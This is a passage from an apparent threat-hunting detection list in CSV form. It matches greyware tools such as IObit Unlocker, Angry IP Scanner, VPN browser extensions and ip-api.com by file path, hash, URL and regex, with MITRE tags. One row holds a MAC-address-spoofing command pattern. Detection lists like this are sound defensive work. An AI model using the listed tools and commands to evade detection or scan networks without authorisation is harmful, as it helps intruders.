tool","5","9","N/A","N/A","N/A","N/A" "*\IObitUnlocker.log*",".{0,1000}\\IObitUnlocker\.log.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimately - admin tool","5","9","N/A","N/A","N/A","N/A" "*\IObitUnlockerExtension.dll*",".{0,1000}\\IObitUnlockerExtension\.dll.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 
- TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimately - admin tool","5","9","N/A","N/A","N/A","N/A" "*\Program Files (x86)\IObit\IObit Unlocker*",".{0,1000}\\Program\sFiles\s\(x86\)\\IObit\\IObit\sUnlocker.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimately - admin tool","5","9","N/A","N/A","N/A","N/A" "*\Program Files\IObit\IObit Unlocker*",".{0,1000}\\Program\sFiles\\IObit\\IObit\sUnlocker.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimately - admin tool","5","9","N/A","N/A","N/A","N/A" "*\Uninstall IObit Unlocker.lnk*",".{0,1000}\\Uninstall\sIObit\sUnlocker\.lnk.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimately - admin tool","5","9","N/A","N/A","N/A","N/A" "*\Uninstall IObit Unlocker.url*",".{0,1000}\\Uninstall\sIObit\sUnlocker\.url.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimately - admin tool","5","9","N/A","N/A","N/A","N/A" "*\Unlocker.exe*",".{0,1000}\\Unlocker\.exe.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often 
used legitimately - admin tool","5","9","N/A","N/A","N/A","N/A" "*\unlocker-setup (1).exe*",".{0,1000}\\unlocker\-setup\s\(1\)\.exe.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimately - admin tool","5","9","N/A","N/A","N/A","N/A" "*\unlocker-setup.exe*",".{0,1000}\\unlocker\-setup\.exe.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimately - admin tool","5","9","N/A","N/A","N/A","N/A" "*\unlocker-setup.tmp*",".{0,1000}\\unlocker\-setup\.tmp.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimately - admin tool","5","9","N/A","N/A","N/A","N/A" "*2efdffd1cf3adab21ff760f009d8893d8c4cbcf63b2c3bfcc1139457c9cd430b*",".{0,1000}2efdffd1cf3adab21ff760f009d8893d8c4cbcf63b2c3bfcc1139457c9cd430b.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","#filehash","often used legitimately - admin tool","5","9","N/A","N/A","N/A","N/A" "*http://update.iobit.com/infofiles/iobitunlocker.upt*",".{0,1000}http\:\/\/update\.iobit\.com\/infofiles\/iobitunlocker\.upt.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","1","N/A","often used legitimately - admin 
tool","5","9","N/A","N/A","N/A","N/A" "*https://silentbreaksecurity.com/adaptive-dll-hijacking*",".{0,1000}https\:\/\/silentbreaksecurity\.com\/adaptive\-dll\-hijacking.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","1","N/A","often used legitimately - admin tool","5","9","N/A","N/A","N/A","N/A" "*IObitUnlocker.sys*",".{0,1000}IObitUnlocker\.sys.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimately - admin tool","5","9","N/A","N/A","N/A","N/A" "*ip l set dev * address *:*:*",".{0,1000}ip\sl\sset\sdev\s.{0,1000}\saddress\s.{0,1000}\:.{0,1000}\:.{0,1000}","greyware_tool_keyword","ip","changing mac address with ip","T1497.001 - T1036.004 - T1059.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","5","10","N/A","N/A","N/A","N/A" "*lochiccbgeohimldjooaakjllnafhaid*",".{0,1000}lochiccbgeohimldjooaakjllnafhaid.{0,1000}","greyware_tool_keyword","IP Unblock","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*www.ip-api.com*",".{0,1000}www\.ip\-api\.com.{0,1000}","greyware_tool_keyword","ip-api.com","get public ip address","T1016 - T1071.001","TA0005 - TA0002","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","1","N/A","greyware_tools high risks of false 
positives","N/A","N/A","N/A","N/A","N/A","N/A" "*kchocjcihdgkoplngjemhpplmmloanja*",".{0,1000}kchocjcihdgkoplngjemhpplmmloanja.{0,1000}","greyware_tool_keyword","IPBurger Proxy & VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "* -jar ipscan.exe*",".{0,1000}\s\-jar\sipscan\.exe.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","network exploitation tool","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*/AppFiles/ipscan.exe*",".{0,1000}\/AppFiles\/ipscan\.exe.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*/ipscan.exe*",".{0,1000}\/ipscan\.exe.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","1","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*/ipscan.git*",".{0,1000}\/ipscan\.git.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","1","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*/ipscan_*_amd64.deb*",".{0,1000}\/ipscan_.{0,1000}_amd64\.deb.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*/ipscan2-binary/*.exe*",".{0,1000}\/ipscan2\-binary\/.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*/ipscan-any-*.jar*",".{0,1000}\/ipscan\-any\-.{0,1000}\.jar.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*\Angry IP Scanner.app*",".{0,1000}\\Angry\sIP\sScanner\.app.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*\ipscan-*-setup.exe*",".{0,1000}\\ipscan\-.{0,1000}\-setup\.exe.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*\ipscan.exe*",".{0,1000}\\ipscan\.exe.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*\ipscan221.exe*",".{0,1000}\\ipscan221\.exe.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*\ipscan-crash.txt*",".{0,1000}\\ipscan\-crash\.txt.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*00d223d61d1569d44bfe81805359f94c15c9549473762016605287c31733bae6*",".{0,1000}00d223d61d1569d44bfe81805359f94c15c9549473762016605287c31733bae6.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*00e3b8a6e650a206a6070be87c2c1d5387c21f9f6b80d18ee683c2c0f5fd2fe5*",".{0,1000}00e3b8a6e650a206a6070be87c2c1d5387c21f9f6b80d18ee683c2c0f5fd2fe5.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - 
abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*02737dd93d82d2cc1e46914a3650dde655c34e68b6f2038039bff29bb2ec382a*",".{0,1000}02737dd93d82d2cc1e46914a3650dde655c34e68b6f2038039bff29bb2ec382a.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*02d7942d0d329dd9b3df2425926bbc8cb634e416b4482fdee73e5aa4e60e00da*",".{0,1000}02d7942d0d329dd9b3df2425926bbc8cb634e416b4482fdee73e5aa4e60e00da.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*02e2cdb9266754c45c205c199b3478e372c234d6a048a2719796bdb8d3ac2731*",".{0,1000}02e2cdb9266754c45c205c199b3478e372c234d6a048a2719796bdb8d3ac2731.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*04844b7aee9a823f89337a62f63b36eef9f250d8b0b6ba151117de798e3d7454*",".{0,1000}04844b7aee9a823f89337a62f63b36eef9f250d8b0b6ba151117de798e3d7454.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*0512029520eaea2237833ed86b40aadb61ab98861da8c135dfc513524f74a4bc*",".{0,1000}0512029520eaea2237833ed86b40aadb61ab98861da8c135dfc513524f74a4bc.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*0522e7c0979e1598e40817e5d7a4bc05fd7448115237bd883c91f954ce3817a2*",".{0,1000}0522e7c0979e1598e40817e5d7a4bc05fd7448115237bd883c91f954ce3817a2.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*057519a7348a5e04eef59aafbeddcffe8f2027e76e141160a147292e24017d88*",".{0,1000}057519a7348a5e04eef59aafbeddcffe8f2027e76e141160a147292e24017d88.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*060978f4ecf406020b835643e9995ce4e33be8bcdbfc17e82781c8858fb3f971*",".{0,1000}060978f4ecf406020b835643e9995ce4e33be8bcdbfc17e82781c8858fb3f971.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*0676d3458ff6562c5b7fb3229fa9b9fa02e055ea773ce8ecbe45c4f01c43febb*",".{0,1000}0676d3458ff6562c5b7fb3229fa9b9fa02e055ea773ce8ecbe45c4f01c43febb.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*06c6c311f542cc48cf6f40e6f7d7a8769d933841aa1a5a532fca7015d14017b3*",".{0,1000}06c6c311f542cc48cf6f40e6f7d7a8769d933841aa1a5a532fca7015d14017b3.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*07c379cc290a52b11493d1edf234b842d2640963ba258b21b8cd16ad082d568e*",".{0,1000}07c379cc290a52b11493d1edf234b842d2640963ba258b21b8cd16ad082d568e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*087a45762e1d7760cb0a52f74e797ece192cf338a1c090c198733bd5a6166bcc*",".{0,1000}087a45762e1d7760cb0a52f74e797ece192cf338a1c090c198733bd5a6166bcc.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*09c5de00c5304e6f2b2e3f031202fa6175748a451cb4e7d8c7c122ad2736f215*",".{0,1000}09c5de00c5304e6f2b2e3f031202fa6175748a451cb4e7d8c7c122ad2736f215.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*09c97fef43a054ad611912d81971b8e58395bfda3d280ef8242c74fcec0c63ea*",".{0,1000}09c97fef43a054ad611912d81971b8e58395bfda3d280ef8242c74fcec0c63ea.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*0a15c94da1d3260464b1fb81195631f9c336471090aba0989424c75a02d4d91a*",".{0,1000}0a15c94da1d3260464b1fb81195631f9c336471090aba0989424c75a02d4d91a.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*0a4958c4b72f0ec7aac3a9601675737d1ae3bdf80063e2997a99d5b3ffd45295*",".{0,1000}0a4958c4b72f0ec7aac3a9601675737d1ae3bdf80063e2997a99d5b3ffd45295.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*0b65b97063a6a2342da20ec4779b189bad3753dc596f7e79e72021fa17e20bab*",".{0,1000}0b65b97063a6a2342da20ec4779b189bad3753dc596f7e79e72021fa17e20bab.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*0b7ff7dec2fdc2d87ef6837cbc2fdde8753da066959c78a99d1c508d1037b926*",".{0,1000}0b7ff7dec2fdc2d87ef6837cbc2fdde8753da066959c78a99d1c508d1037b926.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*0c1ce0a85821e71d41b86deb8b16f43fe5150c376b3eb8de93979ead13bd57f6*",".{0,1000}0c1ce0a85821e71d41b86deb8b16f43fe5150c376b3eb8de93979ead13bd57f6.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*0cd720bb196cf0e2025f393effe11cb888cf4a069add5b0ffa7cbf73635d1de3*",".{0,1000}0cd720bb196cf0e2025f393effe11cb888cf4a069add5b0ffa7cbf73635d1de3.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*0f49299cf3e23fa2b1c5f0f1869a8982cdde2613742508d81a901a4e52ef37fa*",".{0,1000}0f49299cf3e23fa2b1c5f0f1869a8982cdde2613742508d81a901a4e52ef37fa.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*0fd4612b5f3adcd0d1a9afbcda38955ed3ce0e4eff1a7afdec9953700926c29e*",".{0,1000}0fd4612b5f3adcd0d1a9afbcda38955ed3ce0e4eff1a7afdec9953700926c29e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*102c6bc06ee275f6d3fb46d3d48e71b92abf2b7451e682749cbcae61e4791e05*",".{0,1000}102c6bc06ee275f6d3fb46d3d48e71b92abf2b7451e682749cbcae61e4791e05.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*10562b3a636cb93258959e76fa52708108f65e58287e909f4c041839df5863bd*",".{0,1000}10562b3a636cb93258959e76fa52708108f65e58287e909f4c041839df5863bd.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*1222d5ac68ab90dfcb14e3c2e2258d695de12b27d3aadbbd94aa85a3a85d4701*",".{0,1000}1222d5ac68ab90dfcb14e3c2e2258d695de12b27d3aadbbd94aa85a3a85d4701.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*15c549c4a529d14185633144bd53bffa7d79d84916756cefa267071bf6871cfe*",".{0,1000}15c549c4a529d14185633144bd53bffa7d79d84916756cefa267071bf6871cfe.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*16689e0739ff392f0240dea50b9f48b720bfac3a26a42adf52729321ee5d1f9c*",".{0,1000}16689e0739ff392f0240dea50b9f48b720bfac3a26a42adf52729321ee5d1f9c.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*16cee34ed7af7175f622197c764fd0c69399bc6dc8b7d891ac76266d077c5415*",".{0,1000}16cee34ed7af7175f622197c764fd0c69399bc6dc8b7d891ac76266d077c5415.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*16da15648dd1bc0da44d0d6afd435c1a664cfaf9b7bc4ef7eecdd796727e40df*",".{0,1000}16da15648dd1bc0da44d0d6afd435c1a664cfaf9b7bc4ef7eecdd796727e40df.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*18d131bb7a04a65222cfb35ce549326e9debb5379d04e68d3d75e2d4ae24eb7d*",".{0,1000}18d131bb7a04a65222cfb35ce549326e9debb5379d04e68d3d75e2d4ae24eb7d.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*19e5eb368d5b82d650a5ab168f4041dc2f2e526569349319c8d0adcde091a7d5*",".{0,1000}19e5eb368d5b82d650a5ab168f4041dc2f2e526569349319c8d0adcde091a7d5.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*1a1d59b366b35108f0681a69a77a8d67cae6d6111c589703526964e0243cf62f*",".{0,1000}1a1d59b366b35108f0681a69a77a8d67cae6d6111c589703526964e0243cf62f.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
